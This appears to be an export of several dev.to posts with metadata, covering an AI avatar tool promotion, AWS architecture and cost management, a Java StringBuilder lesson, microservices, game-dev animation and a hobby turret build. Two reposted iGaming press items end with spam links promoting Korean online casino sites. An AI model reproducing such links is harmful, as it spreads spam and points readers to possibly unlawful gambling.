1,878,599 | V-Express: 1-Click AI Avatar Talking Heads Video Animation Generator - D-ID Alike - Open Source | V-Express: 1-Click AI Avatar Talking Heads Video Animation Generator — D-ID Alike — Free Open... | 0 | 2024-06-06T01:07:33 | https://dev.to/furkangozukara/v-express-1-click-ai-avatar-talking-heads-video-animation-generator-d-id-alike-open-source-1kj8 | beginners, tutorial, ai, learning | <p style="margin-left:0px;"><a target="_blank" rel="noopener noreferrer" href="https://youtu.be/xLqDTVWUSec"><u>V-Express: 1-Click AI Avatar Talking Heads Video Animation Generator — D-ID Alike — Free Open Source</u></a></p>
<p style="margin-left:0px;">Tutorial link : <a target="_blank" rel="noopener noreferrer" href="https://youtu.be/xLqDTVWUSec"><u>https://youtu.be/xLqDTVWUSec</u></a></p>
<p style="margin-left:auto;"> </p>
<p style="margin-left:auto;">{% embed https://youtu.be/xLqDTVWUSec %}</p>
<p style="margin-left:auto;"> </p>
<p style="margin-left:0px;">Ever wished your static images could talk like magic? Meet V-Express, the groundbreaking open-source and free tool that breathes life into your photos! Whether you have an audio clip or a video, V-Express animates your images to create stunning talking avatars. Just like the acclaimed D-ID Avatar, Wav2Lip, and Avatarify, V-Express turns your still photos into dynamic, speaking personas, but with a twist — it’s completely open-source and free to use! With seamless audio integration and the ability to mimic video expressions, V-Express offers an unparalleled experience without any cost or restrictions. Experience the future of digital avatars today — let’s dive into how you can get started with V-Express and watch your images come alive!</p>
<p style="margin-left:0px;">1-Click V-Express Installers Scripts ⤵️<br><a target="_blank" rel="noopener noreferrer" href="https://www.patreon.com/posts/105251204"><u>https://www.patreon.com/posts/105251204</u></a></p>
<p style="margin-left:0px;">Requirements Step by Step Tutorial ⤵️<br><a target="_blank" rel="noopener noreferrer" href="https://youtu.be/-NjNy7afOQ0"><u>https://youtu.be/-NjNy7afOQ0</u></a></p>
<p style="margin-left:0px;">Massed Compute Register and Login ⤵️<br><a target="_blank" rel="noopener noreferrer" href="https://vm.massedcompute.com/signup?linkId=lp_034338&sourceId=secourses&tenantId=massed-compute"><u>https://vm.massedcompute.com/signup?linkId=lp_034338&sourceId=secourses&tenantId=massed-compute</u></a></p>
<p style="margin-left:0px;">Official Rope GitHub Repository ⤵️<br><a target="_blank" rel="noopener noreferrer" href="https://github.com/tencent-ailab/V-Express"><u>https://github.com/tencent-ailab/V-Express</u></a></p>
<p style="margin-left:0px;">SECourses Discord Channel to Get Full Support ⤵️<br><a target="_blank" rel="noopener noreferrer" href="https://discord.com/servers/software-engineering-courses-secourses-772774097734074388"><u>https://discord.com/servers/software-engineering-courses-secourses-772774097734074388</u></a></p>
<p style="margin-left:0px;">0:00 Introduction to the V-Express with demo showcase<br>1:23 The features of the V-Express talking avatars app<br>2:02 How to download and install V-Express on Windows<br>3:29 Which requirements are necessary and how to install and verify them<br>4:56 How to uninstall my scripts installed apps<br>5:35 How to save installation logs to send me in case of any error<br>6:05 How to start using V-Express Gradio app after installation and the settings of the app<br>8:14 Explanation of auto cropping<br>9:05 Generating first example video and how much VRAM it is using and how much time it is taking<br>10:57 The location of where generated videos are saved</p>
<p style="margin-left:0px;">Transforming Static Images into Dynamic Videos: A Comprehensive Guide<br>In the evolving landscape of digital content creation, transforming static images into dynamic, talking avatars is no longer a complex task reserved for professionals. With advancements in AI technology, applications like Tencent AI Lab’s V-Express, D-ID, and other commercial tools have made this process accessible to everyone. This article delves into the functionalities of these applications, focusing on how they can be utilized to create engaging video content from static images, thereby enhancing your content’s SEO and overall impact.</p>
<p style="margin-left:0px;">Introduction to Tencent AI Lab V-Express<br>Tencent AI Lab V-Express is an innovative open-source application designed to convert static images into talking avatars. This tool supports both audio and video inputs, making it versatile for various content creation needs. Here’s a step-by-step guide on how to install and use V-Express on Windows.</p>
<p style="margin-left:0px;">Installation Guide<br>Preparation: Download the V-Express zip files and demo images from the provided links. Avoid using space characters in folder names to prevent path handling issues.<br>Extraction: Extract the downloaded zip files into your chosen directory.<br>Installation: Double-click the windows_install.bat file. This will install the application into a virtual environment, ensuring it doesn’t conflict with other applications.<br>Configuration: Verify the installation of Python 3.10.11, Git, FFmpeg, CUDA 11.8, and C++ tools by running specific commands in CMD.<br>Execution: Once installed, double-click the windows_start.bat file to start the application.<br>Using V-Express<br>Upload: Upload a static image and an audio or video file.<br>Settings: Configure settings like retarget strategy, video width, and height, VRAM usage, and face focus expansion.<br>Generation: Click generate to create the video. The application will save the output in the specified folder.<br>Exploring D-ID and Other Commercial Apps<br>D-ID<br>D-ID is a commercial application known for its advanced capabilities in transforming static images into videos. It offers features like:</p>
<p style="margin-left:0px;">Realistic Animations: Creates highly realistic talking avatars.<br>Customization: Allows users to customize facial expressions and movements.<br>Ease of Use: User-friendly interface suitable for non-technical users.<br>Other Notable Apps<br>Synthesia: Specializes in creating AI-generated videos with human-like avatars. It’s widely used for corporate training and marketing.<br>Reallusion iClone: Offers robust tools for 3D animation and character creation, making it ideal for professional animators.<br>DeepBrain: Focuses on converting text to speech with animated avatars, perfect for educational content.</p>
<p style="margin-left:auto;">
<picture>
<source srcset="https://miro.medium.com/v2/resize:fit:640/format:webp/1*L7dA6pzWpIODenomOZE4TQ.png 640w, https://miro.medium.com/v2/resize:fit:720/format:webp/1*L7dA6pzWpIODenomOZE4TQ.png 720w, https://miro.medium.com/v2/resize:fit:750/format:webp/1*L7dA6pzWpIODenomOZE4TQ.png 750w, https://miro.medium.com/v2/resize:fit:786/format:webp/1*L7dA6pzWpIODenomOZE4TQ.png 786w, https://miro.medium.com/v2/resize:fit:828/format:webp/1*L7dA6pzWpIODenomOZE4TQ.png 828w, https://miro.medium.com/v2/resize:fit:1100/format:webp/1*L7dA6pzWpIODenomOZE4TQ.png 1100w, https://miro.medium.com/v2/resize:fit:1400/format:webp/1*L7dA6pzWpIODenomOZE4TQ.png 1400w" type="image/webp" sizes="(min-resolution: 4dppx) and (max-width: 700px) 50vw, (-webkit-min-device-pixel-ratio: 4) and (max-width: 700px) 50vw, (min-resolution: 3dppx) and (max-width: 700px) 67vw, (-webkit-min-device-pixel-ratio: 3) and (max-width: 700px) 65vw, (min-resolution: 2.5dppx) and (max-width: 700px) 80vw, (-webkit-min-device-pixel-ratio: 2.5) and (max-width: 700px) 80vw, (min-resolution: 2dppx) and (max-width: 700px) 100vw, (-webkit-min-device-pixel-ratio: 2) and (max-width: 700px) 100vw, 700px">
<source srcset="https://miro.medium.com/v2/resize:fit:640/1*L7dA6pzWpIODenomOZE4TQ.png 640w, https://miro.medium.com/v2/resize:fit:720/1*L7dA6pzWpIODenomOZE4TQ.png 720w, https://miro.medium.com/v2/resize:fit:750/1*L7dA6pzWpIODenomOZE4TQ.png 750w, https://miro.medium.com/v2/resize:fit:786/1*L7dA6pzWpIODenomOZE4TQ.png 786w, https://miro.medium.com/v2/resize:fit:828/1*L7dA6pzWpIODenomOZE4TQ.png 828w, https://miro.medium.com/v2/resize:fit:1100/1*L7dA6pzWpIODenomOZE4TQ.png 1100w, https://miro.medium.com/v2/resize:fit:1400/1*L7dA6pzWpIODenomOZE4TQ.png 1400w" sizes="(min-resolution: 4dppx) and (max-width: 700px) 50vw, (-webkit-min-device-pixel-ratio: 4) and (max-width: 700px) 50vw, (min-resolution: 3dppx) and (max-width: 700px) 67vw, (-webkit-min-device-pixel-ratio: 3) and (max-width: 700px) 65vw, (min-resolution: 2.5dppx) and (max-width: 700px) 80vw, (-webkit-min-device-pixel-ratio: 2.5) and (max-width: 700px) 80vw, (min-resolution: 2dppx) and (max-width: 700px) 100vw, (-webkit-min-device-pixel-ratio: 2) and (max-width: 700px) 100vw, 700px"><img class="image_resized" style="height:auto;width:680px;" src="https://miro.medium.com/v2/resize:fit:1313/1*L7dA6pzWpIODenomOZE4TQ.png" alt="" width="700" height="394">
</picture>
</p> | furkangozukara |
1,867,076 | AWS multi-region Serverless application variant. | Multi-Region applications comes in very handy when you want to deal with users from different... | 0 | 2024-06-06T01:04:41 | https://dev.to/asankab/aws-multi-region-serverless-application-variant-2348 | serverless, multiregion, apigateway, lambda | Multi-Region applications comes in very handy when you want to deal with users from different geographical locations, eliminating latency issue depending on distance from the place where your users accesses your application and also helps in maintaining High-Availability and DR (Disaster Recovery) situations without disrupting your users in case of a regions downtime from your cloud service provider.

**Below is a brief summary of the services used for the below variant.**
- **Rote53**:
Amazon Route 53 is a scalable and highly available domain name system (DNS) web service designed to route end-user requests to internet applications by translating domain names into IP addresses. It also provides domain registration, DNS health checks, and integrates seamlessly with other AWS services.
- **API Gateway**: AWS API Gateway is a fully managed service that enables developers to create, publish, secure, and monitor RESTful and WebSockets APIs at scale. It seamlessly integrates with AWS services like Lambda, provides robust security features, and scales automatically to handle varying traffic loads.
- **Lambda**: AWS Lambda is a Serverless compute service that allows you to run code without provisioning or managing servers. You can execute code in response to events such as changes in data, shifts in system state, or user actions, and it automatically manages the compute resources required.
- **DynamoDB**: Amazon DynamoDB is a fully managed NoSQL database service that provides fast and predictable performance with seamless scalability. It is designed to handle large amounts of structured data and enables developers to offload the administrative burdens of operating and scaling distributed databases.
- **Amazon Macie**: Amazon Macie is a fully managed data security and data privacy service that uses machine learning and pattern matching to discover, monitor, and protect sensitive data stored in Amazon S3. It helps you identify and safeguard your personally identifiable information (PII) and intellectual property, providing visibility into how this data is accessed and moved across your organization.
**Systems Manager Secret Manager**: AWS Systems Manager Secrets Manager is a service designed to help you protect access to your applications, services, and IT resources without the upfront cost and complexity of managing your own hardware security module (HSM) or physical infrastructure. It allows you to securely store, manage, and retrieve credentials, API keys, and other secrets through a centralized and secure service, providing fine-grained access control and auditing capabilities.
- **CloudWatch**: Amazon CloudWatch is a monitoring and management service designed for developers, system operators, site reliability engineers (SREs), and IT managers. It provides data and actionable insights to monitor applications, understand and respond to system-wide performance changes, optimize resource utilization, and get a unified view of operational health.
_Thank you for your time._ | asankab |
1,878,598 | The Base and Rotation | YOO, WHAT is up guys. I don't know if you remember the base I made in the second post. Well, I 3D... | 0 | 2024-06-06T01:02:18 | https://dev.to/kevinpalma21/the-base-and-rotation-2k6i | design, webdev, beginners, learning |
YOO, WHAT is up guys.
I don't know if you remember the base I made in the second post. Well, I 3D printed that one (Image 1), and it was an okay base overall, but it wasn't deep enough. I made some tweaks to this base. I used the SolidEdit function and chose to stretch the top part of this object. This made it lengthier in the Z direction, which is what I wanted. I also used the fillet edge function to make the sides a bit curvier(Image 2).
(Image 1)
(image 2)
I also wanted to add a feature to this turret. I wanted to add a camera to detect the faces of people and determine who it would shoot. It will be shooting these yellowish Nerf balls, so I need some sort of place to store them. The round diameter is about 14.5 mm(Image 3). I have linked a YouTube video for all the specs on the balls I will be using.
(Image 3)
Youtube video:https://www.youtube.com/watch?v=vaA_xTaRa7I&t=135s
I was also coming up with some ideas on how to proceed with getting the thing to start turning. I plan to design and 3D print another part to facilitate the turret's movement. I want to really get all these pieces first before programming and really making progress on this.
My next step will be making some gears and hopefully not messing up too badly. But AYY F**K it, we ball. Still quite a long way from the finished product.

But that is a sneak peek of what is in store. For now, the biggest question is making IT ROTATE. I need this thing to be able to do a 360. So, time to start throwing ideas and just running it down main.
Well, this is the update I have so far, and next time, hopefully, I am able to solve this whole rotating problem. Thank you once again for reading this, and if y'all have any ideas, comment them down below. | kevinpalma21 |
1,878,597 | Spinomenal granted Croatia iGaming certification | Spinomenal has been granted its certification for the Croatian iGaming market, operators within... | 0 | 2024-06-06T00:51:12 | https://dev.to/jashteen98/spinomenal-granted-croatia-igaming-certification-3ge | Spinomenal has been granted its certification for the Croatian iGaming market, operators within Croatia are now able to gain access to and offer Spinomenal’s suite of HTML5 slots content. Spinomenal games portfolio includes Book of Demi Gods II, Western Tales and Lucky Jack – Tut’s Treasures.
Croatia follows quickly on the back of the Spanish B2B certification and joins an impressive list of iGaming certifications, these markets provide a framework for Spinomenal’s business objectives.
Spinomenal’s CEO, Lior Shvartz, commented: “Our target is to make our standout content widely available across the top performing iGaming markets. We’ve identified the Croatian market as one of big potential and we are pleased to secure our certification.”
[온라인카지노사이트](https://www.casinositetop.com/) , [합법 카지노 사이트](https://www.casinositetop.com/)
| jashteen98 | |
1,878,595 | Inspired signs virtual sports contract with Novibet | Inspired Entertainment has signed a multi-market contract to launch its Virtual Sports content with... | 0 | 2024-06-06T00:49:55 | https://dev.to/jashteen98/inspired-signs-virtual-sports-contract-with-novibet-4ep8 |
Inspired Entertainment has signed a multi-market contract to launch its Virtual Sports content with Novibet. Starting with the Greek market, Inspired’s Virtual Sports are now hosted in a dedicated section on novibet.gr, offering customized and localized Virtual Sports options to players on a 24/7/365 basis.
Inspired’s Virtual Sports are delivered via the company’s Virtual Plug & Play solution, which allows Novibet’s members to access multiple Virtual Sports, including soccer, basketball and horse racing, served through a player interface. Novibet has launched Inspired’s Greek Matchday Soccer League, featuring 16 teams playing a league season of virtual soccer.
Brooks Pierce, president and chief operating officer said: “Novibet is a leading online gaming operator and has been a long-standing customer of Inspired’s on the iGaming side.”
“We are very excited to further enhance their online portfolio to include our award-winning Virtual Sports and we look forward to working together to grow their brand across Europe.”
Thanasis Gkiokas, sports manager at Novibet said: “We have enjoyed working with Inspired to create custom Virtual Sports offerings that are specifically tailored to fully satisfy our members, such as Inspired’s exclusive Greek Matchday Soccer League.”
[온라인카지노사이트](https://www.casinosite.one/)
| jashteen98 | |
1,878,594 | My Game Recommendation Program | Program Showcase Code File Explanation Data File The Data File... | 0 | 2024-06-06T00:43:18 | https://dev.to/carterwr/my-game-recommendation-software-27pk | ## Program Showcase
{% embed https://youtu.be/Uw4t6-4ZoBU %}
## Code File Explanation
### Data File
* The Data [File](https://github.com/CarterWr/Recommendation-Software/blob/main/data.py) is just the data set I hand made by researching different game categories and popular games within them.
### Tree Structure
* The Data structure I used to store the data was a very simple [tree](https://github.com/CarterWr/Recommendation-Software/blob/main/Tree_struct.py) that has one method and that is add child to node, and two attributes value (what the node stores) and children (a list, the nodes children).
### Main File
* The main [file](https://github.com/CarterWr/Recommendation-Software/blob/main/main.py) where the execution happens. not a lot of code is here just calling the main caller function.
### Functions File
* This is where all the magic happens, The functions [file](https://github.com/CarterWr/Recommendation-Software/blob/main/functions.py). The functions file contains a lot of the code that is used in this for example. this is where the initialization of the tree objects to store all of the data in. Most of the code in this file is doc stringed so I won't go into what each function does if your curious go check it out.
Git Hub Repository Link: [here](https://github.com/CarterWr/Recommendation-Software/tree/main)
| carterwr | |
1,878,593 | Understanding Microservices Architecture | Introduction Microservices architecture is gaining popularity among businesses as it... | 0 | 2024-06-06T00:31:57 | https://dev.to/kartikmehta8/understanding-microservices-architecture-3278 | webdev, javascript, beginners, programming | ## Introduction
Microservices architecture is gaining popularity among businesses as it provides several advantages over traditional monolithic architecture. It is an architectural style that breaks down a large software system into small, independent, and modular services, each with its own specific function. These services communicate with each other through well-defined APIs and can be deployed and managed independently. In this article, we will dive into the understanding of microservices architecture, its advantages, disadvantages, and key features.
## Advantages of Microservices
1. **Scalability:** Microservices allow for easier scalability as each service can be scaled independently based on its usage and demand.
2. **Flexibility:** This architecture allows for flexibility in development, as different services can be built using different technologies and languages.
3. **Easy Maintenance:** Since each microservice is independent, it is easier to maintain and update without affecting the entire system.
4. **Cost-effective:** Microservices allow businesses to save costs by only paying for the specific services that are used, rather than the entire system.
## Disadvantages of Microservices
1. **Complex architecture:** Implementing microservices architecture requires expertise and can be complex to design and maintain.
2. **Increased communication overhead:** With multiple services communicating with each other, there is a potential increase in network traffic and communication overhead.
## Key Features of Microservices Architecture
1. **Decentralized:** Microservices architecture follows a decentralized approach where there is no central database or control.
2. **Independent Deployment:** Each service can be deployed independently, making it easier to make changes without affecting the entire system.
### Example of Independent Deployment
Here's an example of how a microservice can be deployed independently using Docker, a popular containerization platform:
```bash
# Build the Docker image for the microservice
docker build -t my-microservice .
# Run the microservice in a new container
docker run -p 4000:4000 my-microservice
```
This example demonstrates the ease of deploying a microservice independently, allowing for updates and maintenance without downtime for the entire system.
## Conclusion
Microservices architecture offers several advantages, such as scalability, flexibility, and cost-effectiveness. However, it also brings in challenges such as complexity and increased communication overhead. Understanding the architecture and carefully considering its implementation is crucial for businesses to reap its benefits and overcome its challenges. Overall, microservices architecture is a revolutionary approach that is transforming the way software systems are designed, developed, and deployed. | kartikmehta8 |
1,878,592 | Optimising Your Cloud Spend: Top Strategies for AWS Cost Management | Visit my blog PracticalCloud for more indepth cloud computing articles. In today's cloud-driven... | 0 | 2024-06-06T00:22:55 | https://practicalcloud.net/optimising-your-cloud-spend-top-strategies-for-aws-cost-management/ | aws, cloud, devops | Visit my blog [PracticalCloud](https://practicalcloud.net) for more indepth cloud computing articles.
In today's cloud-driven world, businesses are increasingly migrating to AWS to leverage its scalability, agility, and wide range of services. However, managing cloud costs effectively is essential to ensure you're getting the most out of your AWS investment. In this article, we will explore several key strategies for optimizing your AWS costs and maximizing your return on investment (ROI).
## Understanding AWS Pricing
Before diving into cost optimization strategies, it’s crucial to understand how AWS pricing works. AWS uses a pay-as-you-go model, which means you only pay for the services you use. However, the complexity of AWS pricing can make cost management challenging. Here are the main components to consider:
1. Compute Costs: Charges for virtual servers (EC2 instances), Lambda executions, etc.
2. Storage Costs: Charges for data storage (S3, EBS, etc.) and data transfer.
3. Data Transfer Costs: Charges for data moving in and out of AWS.
4. Miscellaneous Costs: Charges for additional services like RDS, CloudFront, etc.
## Top Strategies for AWS Cost Management
1. Right-Sizing Your Instances
Right-sizing involves matching instance types and sizes to your workload’s needs. Over-provisioning resources leads to unnecessary costs, while under-provisioning can impact performance.
How to Right-Size:
Analyze Usage Patterns: Use AWS CloudWatch and Cost Explorer to analyze your instance usage and performance.
Choose the Right Instance Types: AWS offers various instance types optimized for different workloads (compute-optimized, memory-optimized, etc.).
Utilize Auto Scaling: Set up Auto Scaling to automatically adjust capacity to maintain steady, predictable performance at the lowest possible cost.
2. Leverage AWS Savings Plans and Reserved Instances
AWS offers Savings Plans and Reserved Instances (RIs) for long-term commitments, which can significantly reduce costs.
## Savings Plans vs. Reserved Instances:
Savings Plans: Flexible pricing plans offering savings over on-demand pricing, applicable across any region and instance family.
Reserved Instances: Offer significant discounts (up to 75%) compared to On-Demand pricing in exchange for a commitment to use AWS for a 1- or 3-year term.
How to Use Them:
Analyze Historical Usage: Use Cost Explorer to identify stable workloads that can benefit from long-term commitments.
Choose the Right Plan: Based on your usage pattern, select either a Compute Savings Plan or an EC2 Instance Savings Plan.
Regular Review: Periodically review and adjust your reservations to match your evolving workload.
3. Utilize Spot Instances
Spot Instances offer unused EC2 capacity at up to 90% discount compared to On-Demand prices. They are ideal for flexible, stateless, and fault-tolerant workloads.
## Best Practices for Spot Instances:
Spot Fleet: Use Spot Fleet to automate the allocation and management of Spot Instances.
Instance Interruption Handling: Implement fault-tolerant design patterns to handle potential Spot Instance interruptions.
Combine with On-Demand and RIs: Use a mix of Spot, On-Demand, and Reserved Instances for optimal cost savings and reliability.
4. Monitor and Optimize Storage Costs
Storage costs can quickly escalate if not properly managed. AWS provides tools and best practices to optimize storage expenses.
## Strategies for Storage Optimization:
S3 Lifecycle Policies: Automate transitioning of objects to lower-cost storage classes (e.g., from S3 Standard to S3 Glacier) based on their lifecycle.
Delete Unused Data: Regularly audit and delete unused or old data.
Optimize EBS Volumes: Identify and delete unused EBS volumes, take advantage of EBS volume types that best match your performance and cost needs.
5. Implement Cost Allocation and Tagging
Cost allocation and tagging allow you to track and manage AWS costs by associating them with different departments, projects, or teams.
## How to Implement Tagging:
Define a Tagging Strategy: Establish a consistent tagging strategy across your organization.
Use AWS Cost Allocation Tags: Tag resources with cost allocation tags to categorize and track costs.
Leverage Cost Explorer and AWS Budgets: Use these tools to analyze tagged resources and monitor spending.
6. Use AWS Cost Management Tools
AWS provides several tools to help you manage and optimize your cloud spend:
AWS Cost Explorer: Visualize, understand, and manage your AWS costs and usage over time.
AWS Budgets: Set custom cost and usage budgets and receive alerts when you exceed them.
AWS Trusted Advisor: Provides real-time guidance to help you optimize your AWS infrastructure, improve security, and reduce costs.
Scenario-Based Cost Optimization Examples
## Scenario 1: Seasonal Traffic Spikes
Problem: An e-commerce website experiences high traffic during holiday seasons.
Solution: Use Auto Scaling to automatically adjust the number of instances based on traffic. Leverage Spot Instances during peak hours to save costs and Reserved Instances for baseline capacity.
## Scenario 2: Development and Testing Environments
Problem: Development and testing environments are running 24/7, leading to high costs.
Solution: Implement start/stop schedules for non-production instances using AWS Instance Scheduler. Use Spot Instances for testing workloads that can tolerate interruptions.
## Scenario 3: Data Analytics and Big Data Processing
Problem: High costs associated with big data processing.
Solution: Use S3 Lifecycle policies to move old data to cheaper storage classes. Leverage Spot Instances for data processing jobs. Use Amazon Athena for cost-effective querying of data stored in S3.
Optimizing AWS costs is crucial for maximizing the value of your cloud investment. By understanding AWS pricing and employing strategies such as right-sizing, leveraging Savings Plans and Spot Instances, monitoring storage costs, implementing cost allocation and tagging, and using AWS cost management tools, you can significantly reduce your cloud spend. Regularly review and adjust your strategies to align with your evolving workloads and business needs. With these best practices, you'll be well on your way to mastering AWS cost management. | kelvinskell |
1,878,590 | Case Study: Ignoring Nonalphanumeric Characters When Checking Palindromes | Palindrome.java, here considered all the characters in a string to check whether it is a palindrome.... | 0 | 2024-06-06T00:15:31 | https://dev.to/paulike/case-study-ignoring-nonalphanumeric-characters-when-checking-palindromes-34n9 | java, programming, learning, beginners | Palindrome.java, [here](https://dev.to/paulike/case-studies-on-loops-27l1) considered all the characters in a string to check whether it is a palindrome. Write a new program that ignores nonalphanumeric characters in checking whether a string is a palindrome.
Here are the steps to solve the problem:
1. Filter the string by removing the nonalphanumeric characters. This can be done by creating an empty string builder, adding each alphanumeric character in the string to a string builder, and returning the string from the string builder. You can use the **isLetterOrDigit(ch)** method in the **Character** class to check whether character **ch** is a letter or a digit.
2. Obtain a new string that is the reversal of the filtered string. Compare the reversed string with the filtered string using the **equals** method.
The complete program is shown in the program below.
```
package demo;
import java.util.Scanner;
public class PalindromeIgnoreNonAlphanumeric {
public static void main(String[] args) {
// Create a Scanner
Scanner input = new Scanner(System.in);
// Prompt the user to enter a string
System.out.print("Enter a string: ");
String s = input.nextLine();
// Display result
System.out.println("Ignoring nonalphanumeric characters, \nis " + s + " a palindrome? " + isPalindrome(s));
}
/** Return true if a string is a palindrome */
public static boolean isPalindrome(String s) {
// Create a new string by eliminating nonalphanumeric chars
String s1 = filter(s);
// Create a new string that is the reversal of s1
String s2 = reverse(s1);
// Check if the reversal is the same as the original string
return s2.equals(s1);
}
/** Create a new string by eliminating nonalphanumeric chars */
public static String filter(String s) {
// Create a string builder
StringBuilder stringBuilder = new StringBuilder();
// Examine each char in the string to skip alphanumeric char
for(int i = 0; i < s.length(); i++) {
if(Character.isLetterOrDigit(s.charAt(i))) {
stringBuilder.append(s.charAt(i));
}
}
// Return a new filtered string
return stringBuilder.toString();
}
/** Create a new string by reversing a specified string */
public static String reverse(String s) {
StringBuilder stringBuilder = new StringBuilder(s);
stringBuilder.reverse(); // Invoke reverse in StringBuilder
return stringBuilder.toString();
}
}
```
The **filter(String s)** method (lines 31–44) examines each character in string **s** and copies it to a string builder if the character is a letter or a numeric character. The **filter** method returns the string in the builder. The **reverse(String s)** method (lines 47–51) creates a new string that reverses the specified string **s**. The **filter** and **reverse** methods both return a new string. The original string is not changed.
The program in the linked post above checks whether a string is a palindrome by comparing pairs of characters from both ends of the string. The program above uses the **reverse** method in the **StringBuilder** class to reverse the string, then compares whether the two strings are equal to determine whether the original string is a palindrome | paulike |
1,878,589 | [Game of Purpose] Day 18 - making flying animations | Today I followed up a second part of a flying tutorial, where I added animations. I have to say that... | 27,434 | 2024-06-06T00:12:01 | https://dev.to/humberd/game-of-purpose-day-18-making-flying-animations-2d38 | gamedev | Today I followed up a [second part of a flying tutorial](https://www.youtube.com/watch?v=XOdR5DRsiz0), where I added animations.
I have to say that the tutorial was too fast. The author just told what to click and where without even explaining what was going on. So let me be clear what happened:
1. First I imported custom Akai character model from [mixamo.com](https://www.mixamo.com).
2. Then I imported Floating and Flying animations also from [mixamo.com](https://www.mixamo.com).
3. Then I created **IK Rig** for both Manny (my current character) and Akai (the imported one), where I used their skeletal meshes to mark body parts. I selected elements responsible for moving Spine, Head, Left Arm, Ritht Arm, Left Leg and Right Leg and named them accordingly. This was important I think, because the internal structure looks different between these 2 models and doing this step we just mark common parts.

4. Animations I downloaded are strictly tied to a skeleton of Akai character, because they are from the same vendor (Or not??? I'm not sure). To make sure they work on Manny I created **IK Retargeter**. Inside I selected IK Rig for Akai as a source and IK Rig for Manny as a target. This way we can map that Head from one rig maps to a head to another rig.

5. Inside that **IK Retargeter** I exported Flying and Floating animations to a dedicated files. These animations work with Manny skeleton, whereas the original ones work with only Akai skeleton. 
6. Then I created **Blend Space 1d**, which creates a smooth transition between the 2 animations. Inside I created a variable `Speed`, which controls which animation to choose more. The closer to 0, the more it's Floating; the closer to 600, the more it's Flying.

7. At last I needed to edit Animation Blueprint for Manny. First I needed to set up local variable `IsFlying`. Every animation tick it would be updated to a `MovementComponent.IsFlying`. I'm not sure why it was needed. We could use `MovementComponent.IsFlying` directly everywhere, but I guess it's so that this blueprint has a single source of truth and is more readable.

Now this step I don't quite understand. I disconnected the red line and connected Locomotion directly to the Output Pose. Why?

Then I edited Locomotion state machine with Flying state.

I updated all the transitions to and from the Flying state with a logic using the newly created `IsFlying` variable.

Here is the final result:
{% embed https://youtu.be/PEaOfZol5y0 %}
There were some many files created that during the tutorial I didn't know why they were needed. Only during writing this post everything made sens after writing it down.
| humberd |
1,878,587 | The StringBuilder and StringBuffer Classes | The StringBuilder and StringBuffer classes are similar to the String class except that the String... | 0 | 2024-06-06T00:03:24 | https://dev.to/paulike/the-stringbuilder-and-stringbuffer-classes-4gdc | java, programming, learning, beginners | The **StringBuilder** and **StringBuffer** classes are similar to the **String** class except that the **String** class is immutable. In general, the **StringBuilder** and **StringBuffer** classes can be used wherever a string is used. **StringBuilder** and **StringBuffer** are more flexible than **String**. You can add, insert, or append new contents into **StringBuilder** and **StringBuffer** objects, whereas the value of a **String** object is fixed once the string is created.
The **StringBuilder** class is similar to **StringBuffer** except that the methods for modifying the buffer in **StringBuffer** are _synchronized_, which means that only one task is allowed to execute the methods. Use **StringBuffer** if the class might be accessed by multiple tasks concurrently, because synchronization is needed in this case to prevent corruptions to **StringBuffer**. Using **StringBuilder** is more efficient if it is accessed by just a single task, because no synchronization is needed in this case. The constructors and methods in **StringBuffer** and **StringBuilder** are almost the same. This section covers **StringBuilder**. You can replace **StringBuilder** in all occurrences in this section by **StringBuffer**. The program can compile and run without any other changes.
The **StringBuilder** class has three constructors and more than 30 methods for managing the builder and modifying strings in the builder. You can create an empty string builder or a string builder from a string using the constructors, as shown in Figure below.

## Modifying Strings in the StringBuilder
You can append new contents at the end of a string builder, insert new contents at a specified position in a string builder, and delete or replace characters in a string builder, using the methods listed in Figure below.

The **StringBuilder** class provides several overloaded methods to append **boolean**, **char**, **char[]**, **double**, **float**, **int**, **long**, and **String** into a string builder. For example, the following code appends strings and characters into **stringBuilder** to form a new string, **Welcome to Java**.
`StringBuilder stringBuilder = new StringBuilder();
stringBuilder.append("Welcome");
stringBuilder.append(' ');
stringBuilder.append("to");
stringBuilder.append(' ');
stringBuilder.append("Java");`
The **StringBuilder** class also contains overloaded methods to insert **boolean**, **char**, **char array**, **double**, **float**, **int**, **long**, and **String** into a string builder. Consider the following code:
`stringBuilder.insert(11, "HTML and ");`
Suppose **stringBuilder** contains **Welcome to Java** before the **insert** method is applied. This code inserts **"HTML and "** at position 11 in **stringBuilder** (just before the **J**). The new **stringBuilder** is **Welcome to HTML and Java**.
You can also delete characters from a string in the builder using the two **delete** methods, reverse the string using the **reverse** method, replace characters using the **replace** method, or set a new character in a string using the **setCharAt** method.
For example, suppose **stringBuilder** contains **Welcome to Java** before each of the following methods is applied:
**stringBuilder.delete(8, 11)** changes the builder to **Welcome Java**.
**stringBuilder.deleteCharAt(8)** changes the builder to **Welcome o Java**.
**stringBuilder.reverse()** changes the builder to **avaJ ot emocleW**.
**stringBuilder.replace(11, 15, "HTML")** changes the builder to **Welcome to HTML**.
**stringBuilder.setCharAt(0, 'w')** sets the builder to **welcome to Java**.
All these modification methods except **setCharAt** do two things:
- Change the contents of the string builder
- Return the reference of the string builder
For example, the following statement
`StringBuilder stringBuilder1 = stringBuilder.reverse();`
reverses the string in the builder and assigns the builder’s reference to **stringBuilder1**. Thus, **stringBuilder** and **stringBuilder1** both point to the same **StringBuilder** object. Recall that a value-returning method can be invoked as a statement, if you are not interested in the return value of the method. In this case, the return value is simply ignored.
For example, in the following statement
`stringBuilder.reverse();`
the return value is ignored.
If a string does not require any change, use **String** rather than **StringBuilder**. Java can perform some optimizations for **String**, such as sharing interned strings.
## The toString, capacity, length, setLength, and charAt Methods
The **StringBuilder** class provides the additional methods for manipulating a string builder and obtaining its properties, as shown in Figure below.

The **capacity()** method returns the current capacity of the string builder. The capacity is the number of characters the string builder is able to store without having to increase its size.
The **length()** method returns the number of characters actually stored in the string builder. The **setLength(newLength)** method sets the length of the string builder. If the **newLength** argument is less than the current length of the string builder, the string builder is truncated to contain exactly the number of characters given by the **newLength** argument. If the **newLength** argument is greater than or equal to the current length, sufficient null characters (**\u0000**) are appended to the string builder so that **length** becomes the **newLength** argument. The **newLength** argument must be greater than or equal to **0**.
The **charAt(index)** method returns the character at a specific **index** in the string builder. The index is **0** based. The first character of a string builder is at index **0**, the next at index **1**, and so on. The **index** argument must be greater than or equal to **0**, and less than the length of the string builder.
